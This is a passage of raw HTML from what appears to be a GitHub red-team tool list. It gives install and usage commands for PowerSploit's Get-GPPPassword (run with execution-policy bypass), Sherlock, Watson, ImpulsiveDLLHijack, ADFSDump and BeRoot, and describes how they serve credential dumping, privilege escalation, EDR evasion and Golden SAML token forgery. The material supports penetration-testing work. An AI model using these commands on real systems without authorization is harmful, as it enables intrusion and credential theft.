instructions\u003c/a\u003e from this tool sheet.\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"powershell.exe -ep bypass\nImport-Module PowerSploit\"\u003e\u003cpre\u003epowershell.exe -ep bypass\nImport-Module PowerSploit\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Get all passwords with additional information\nGet-GPPPassword\n\n# Get list of all passwords\nGet-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Get all passwords with additional information\u003c/span\u003e\nGet-GPPPassword\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Get list of all passwords\u003c/span\u003e\nGet-GPPPassword \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e ForEach-Object {\u003cspan class=\"pl-smi\"\u003e$_\u003c/span\u003e.passwords} \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e Sort-Object -Uniq\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210089230-6a61579b-849d-4175-96ec-6ea75e001038.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210089230-6a61579b-849d-4175-96ec-6ea75e001038.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/rasta-mouse/Sherlock\"\u003eSherlock\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-sherlock\" class=\"anchor\" aria-label=\"Permalink: 🔙Sherlock\" href=\"#sherlock\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ePowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eSupports:\u003c/em\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eMS10-015 : User Mode to Ring (KiTrap0D)\u003c/li\u003e\n\u003cli\u003eMS10-092 : Task Scheduler\u003c/li\u003e\n\u003cli\u003eMS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow\u003c/li\u003e\n\u003cli\u003eMS13-081 : TrackPopupMenuEx Win32k NULL Page\u003c/li\u003e\n\u003cli\u003eMS14-058 : TrackPopupMenu Win32k Null Pointer Dereference\u003c/li\u003e\n\u003cli\u003eMS15-051 : ClientCopyImage Win32k\u003c/li\u003e\n\u003cli\u003eMS15-078 : Font Driver Buffer Overflow\u003c/li\u003e\n\u003cli\u003eMS16-016 : 'mrxdav.sys' WebDAV\u003c/li\u003e\n\u003cli\u003eMS16-032 : Secondary Logon Handle\u003c/li\u003e\n\u003cli\u003eMS16-034 : Windows Kernel-Mode Drivers EoP\u003c/li\u003e\n\u003cli\u003eMS16-135 : Win32k Elevation of Privilege\u003c/li\u003e\n\u003cli\u003eCVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (PowerShell)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Git install\ngit clone https://github.com/rasta-mouse/Sherlock\n\n# Load powershell module\nImport-Module -Name C:\\INSTALL_LOCATION\\Sherlock\\Sherlock.ps1\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Git install\u003c/span\u003e\ngit clone https://github.com/rasta-mouse/Sherlock\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Load powershell module\u003c/span\u003e\nImport-Module -Name C:\u003cspan class=\"pl-cce\"\u003e\\I\u003c/span\u003eNSTALL_LOCATION\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eherlock\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eherlock.ps1\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage: (PowerShell)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run all functions\nFind-AllVulns\n\n# Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)\nFind-MS14058\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run all functions\u003c/span\u003e\nFind-AllVulns\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)\u003c/span\u003e\nFind-MS14058\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210182250-b5e9a4c1-4d30-4591-b06b-7d58098c7fef.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210182250-b5e9a4c1-4d30-4591-b06b-7d58098c7fef.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/\" rel=\"nofollow\"\u003ehttps://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/rasta-mouse/Watson\"\u003eWatson\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-watson\" class=\"anchor\" aria-label=\"Permalink: 🔙Watson\" href=\"#watson\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eWatson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eGreat for identifying missing patches and suggesting exploits that could be used to exploit known vulnerabilities in order to gain higher privileges on the system.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eUsing \u003ca href=\"https://visualstudio.microsoft.com/vs/community/\" rel=\"nofollow\"\u003eVisual Studio 2019 Community Edition\u003c/a\u003e. Open the \u003ca href=\"https://github.com/rasta-mouse/Watson\"\u003eWatson project .sln\u003c/a\u003e, choose \"Release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run all checks\nWatson.exe\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run all checks\u003c/span\u003e\nWatson.exe\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210182370-409be1ac-64f9-4a07-96bd-b0752d7609a2.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210182370-409be1ac-64f9-4a07-96bd-b0752d7609a2.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage text used from \u003ca href=\"https://github.com/rasta-mouse/Watson#usage\"\u003ehttps://github.com/rasta-mouse/Watson#usage\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/knight0x07/ImpulsiveDLLHijack\"\u003eImpulsiveDLLHijack\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-impulsivedllhijack\" class=\"anchor\" aria-label=\"Permalink: 🔙ImpulsiveDLLHijack\" href=\"#impulsivedllhijack\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA C# based tool that automates the process of discovering and exploiting DLL Hijacks in target binaries.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe discovered Hijacked paths can be weaponized, during an engagement, to evade EDR's.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003cstrong\u003eProcmon.exe\u003c/strong\u003e -\u0026gt; \u003ca href=\"https://docs.microsoft.com/en-us/sysinternals/downloads/procmon\" rel=\"nofollow\"\u003ehttps://docs.microsoft.com/en-us/sysinternals/downloads/procmon\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCustom Confirmatory DLL's\u003c/strong\u003e :\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eThese are DLL files which assist the tool to get the confirmation whether the DLL's are been successfully loaded from the identified hijack path\u003c/li\u003e\n\u003cli\u003eCompiled from the MalDLL project provided above (or use the precompiled binaries if you trust me!)\u003c/li\u003e\n\u003cli\u003e32Bit dll name should be: maldll32.dll\u003c/li\u003e\n\u003cli\u003e64Bit dll name should be: maldll64.dll\u003c/li\u003e\n\u003cli\u003eInstall NuGet Package:** PeNet** -\u0026gt; \u003ca href=\"https://www.nuget.org/packages/PeNet/\" rel=\"nofollow\"\u003ehttps://www.nuget.org/packages/PeNet/\u003c/a\u003e (Prereq while compiling the ImpulsiveDLLHijack project)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote: i \u0026amp; ii prerequisites should be placed in the ImpulsiveDLLHijacks.exe's directory itself.\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eBuild and Setup Information:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eImpulsiveDLLHijack\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eClone the repository in Visual Studio\u003c/li\u003e\n\u003cli\u003eOnce project is loaded in Visual Studio go to \"Project\" --\u0026gt; \"Manage NuGet packages\" --\u0026gt; Browse for packages and install \"PeNet\" -\u0026gt; \u003ca href=\"https://www.nuget.org/packages/PeNet/\" rel=\"nofollow\"\u003ehttps://www.nuget.org/packages/PeNet/\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBuild the project!\u003c/li\u003e\n\u003cli\u003eThe ImpulsiveDLLHijack.exe will be inside the bin directory.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eAnd for Confirmatory DLL's:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eClone the repository in Visual Studio\u003c/li\u003e\n\u003cli\u003eBuild the project with x86 and x64\u003c/li\u003e\n\u003cli\u003eRename x86 release as maldll32.dll and x64 release as maldll64.dll\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eSetup:\u003c/strong\u003e Copy the Confirmatory DLL's (maldll32 \u0026amp; maldll64) in the ImpulsiveDLLHijack.exe directory \u0026amp; then execute ImpulsiveDLLHijack.exe :))\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eInstall instructions from \u003ca href=\"https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites\"\u003ehttps://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Help\nImpulsiveDLLHijack.exe -h\n\n# Look for vulnerabilities in an executable \nImpulsiveDLLHijack.exe -path BINARY_PATH\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Help\u003c/span\u003e\nImpulsiveDLLHijack.exe -h\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Look for vulnerabilities in an executable \u003c/span\u003e\nImpulsiveDLLHijack.exe -path BINARY_PATH\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eUsage examples can be found \u003ca href=\"https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210267803-cefee62b-f16d-4768-81d0-9001ef1a2b98.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210267803-cefee62b-f16d-4768-81d0-9001ef1a2b98.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples\"\u003ehttps://github.com/knight0x07/ImpulsiveDLLHijack#4-examples\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/mandiant/ADFSDump\"\u003eADFSDump\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-adfsdump\" class=\"anchor\" aria-label=\"Permalink: 🔙ADFSDump\" href=\"#adfsdump\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA C# tool to dump all sorts of goodies from AD FS.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCreated by Doug Bienstock \u003ca href=\"https://twitter.com/doughsec\" rel=\"nofollow\"\u003e@doughsec\u003c/a\u003e while at Mandiant FireEye.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis tool is designed to be run in conjunction with ADFSpoof. ADFSdump will output all of the information needed in order to generate security tokens using ADFSpoof.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eRequirements:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eADFSDump must be run under the user context of the AD FS service account. You can get this information by running a process listing on the AD FS server or from the output of the Get-ADFSProperties cmdlet. Only the AD FS service account has the permissions needed to access the configuration database. Not even a DA can access this.\u003c/li\u003e\n\u003cli\u003eADFSDump assumes that the service is configured to use the Windows Internal Database (WID). Although it would be trivial to support an external SQL server, this feature does not exist right now.\u003c/li\u003e\n\u003cli\u003eADFSDump must be run locally on an AD FS server, NOT an AD FS web application proxy. The WID can only be accessed locally via a named pipe.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eADFSDump was built against .NET 4.5 with Visual Studio 2017 Community Edition. Simply open up the project .sln, choose \"Release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage: (Flags)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# The Active Directory domain to target. Defaults to the current domain.\n/domain:\n\n# The Domain Controller to target. Defaults to the current DC.\n/server:\n\n# Switch. Toggle to disable outputting the DKM key.\n/nokey\n\n# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.\n/database\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e The Active Directory domain to target. Defaults to the current domain.\u003c/span\u003e\n/domain:\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e The Domain Controller to target. Defaults to the current DC.\u003c/span\u003e\n/server:\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Switch. Toggle to disable outputting the DKM key.\u003c/span\u003e\n/nokey\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.\u003c/span\u003e\n/database\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs\" rel=\"nofollow\"\u003eBlog - Exploring the Golden SAML Attack Against ADFS\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/212204724-65da5505-3576-4e6d-91ab-989b96247182.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/212204724-65da5505-3576-4e6d-91ab-989b96247182.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs\" rel=\"nofollow\"\u003ehttps://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/AlessandroZ/BeRoot\"\u003eBeRoot\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-beroot\" class=\"anchor\" aria-label=\"Permalink: 🔙BeRoot\" href=\"#beroot\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eBeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe goal of BeRoot is to only output potential privilege escalation opportunities and not a endpoint configuration assessment.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis project works on Windows, Linux and Mac OS.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Linux)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/AlessandroZ/BeRoot\ncd BeRoot/Linux/\"\u003e\u003cpre\u003egit clone https://github.com/AlessandroZ/BeRoot\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e BeRoot/Linux/\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Windows)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eA pre-compiled version of BeRoot can be found \u003ca href=\"https://github.com/AlessandroZ/BeRoot/releases\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run BeRoot\npython beroot.py\n\n# Run BeRoot with user password (If you know the password use it, you could get more results)\npython beroot.py --password super_strong_password\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run BeRoot\u003c/span\u003e\npython beroot.py\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run BeRoot with user password (If you know the password use it, you could get more results)\u003c/span\u003e\npython beroot.py --password super_strong_password\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFurther information can be found here for:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/AlessandroZ/BeRoot/tree/master/Linux\"\u003eLinux\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/AlessandroZ/BeRoot/tree/master/Windows\"\u003eWindows\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/238469103-4c84ffeb-1ffb-474a-b028-4c8fcc64deb6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY5MTAzLTRjODRmZmViLTFmZmItNDc0YS1iMDI4LTRjOGZjYzY0ZGViNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xNjg5NzFlZTQ3ZTMwYWVkMGNhMDc3NTJkMzhhZjk0ODgyYzRhZjlkNDlmOWNjYjMyOTE2MjczNWM0YjA3YTc5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.9IdQ4ZIl9Z0B2U5z4hH5EwnKIbIG5d8vhTskYY_KgJ4\"\u003e\u003cimg 